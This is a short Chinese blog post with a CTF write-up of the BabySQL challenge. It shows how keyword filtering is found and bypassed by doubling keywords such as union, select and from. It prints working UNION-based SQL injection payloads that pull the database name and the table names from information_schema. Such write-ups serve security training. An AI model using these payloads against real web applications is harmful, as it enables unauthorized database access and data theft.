[极客大挑战 2019]BabySQL 1

Brucye2026-03-12 18:03

[极客大挑战 2019]BabySQL 1

文章目录

题目预览

基本测试

这里包数据包放到Burp的Repeater中继续进行

单引号测试报错,#号闭合回显,说明有SQL注入点

注意:这里面的空格用+号替换

查列数

回显发现过滤了or,by,回显中留下了der,判断是用replace替换过滤,后面用双写绕过

双写后继续测试

最后测试完是3列

测数据库

后续测试中过滤什么,就双写什么

sql 复制代码 
ununionion+seselectlect+1,2,database()%23

测试到数据库是geek

测数据表

sql 复制代码 
ununionion+seselectlect+1,2,group_concat(table_name)+frfromom+infoorrmation_schema.tables+whwhereere+table_schema='geek'%23

测数据字段

测字段值

完结~

相关推荐
Elastic 中国社区官方博客15 小时前
LINQ 到 ES|QL:使用 C# 查询 Elasticsearch
大数据·数据库·sql·elasticsearch·搜索引擎·全文检索·linq
xcLeigh15 小时前
KES数据库从入门到精通:零基础起步,全面掌握KES核心基础
大数据·数据库·sql·数据分析·国产数据库·kes
Miki Makimura16 小时前
SQL 核心对象学习
数据库·sql·学习
羊小蜜.16 小时前
Mysql 06: 表与字段别名全解——让 SQL 更简洁、可读性拉满
数据库·sql·mysql
一名优秀的码农16 小时前
vulhub系列-55-napping-1.0.1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
mcooiedo16 小时前
ORM框架详解:为什么不直接写SQL?
数据库·sql
Benszen17 小时前
SQL 基础及 MySQL DBA 运维实战 - 6:Mycat代理技术
sql·mysql·dba
ShoreKiten18 小时前
DC-9靶机渗透--CTFer从0到1的进阶之路
网络安全·渗透测试
一名优秀的码农18 小时前
vulhub系列-54-Red(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
2601_9498180918 小时前
LangChain-08 Query SQL DB 通过GPT自动查询SQL
数据库·sql·langchain
热门推荐
01GitHub 镜像站点022026年3月AI领域大事件:DeepSeek引领开源风暴03Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05黄金未来走势预测06AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南07UV安装并设置国内源08让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南09Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)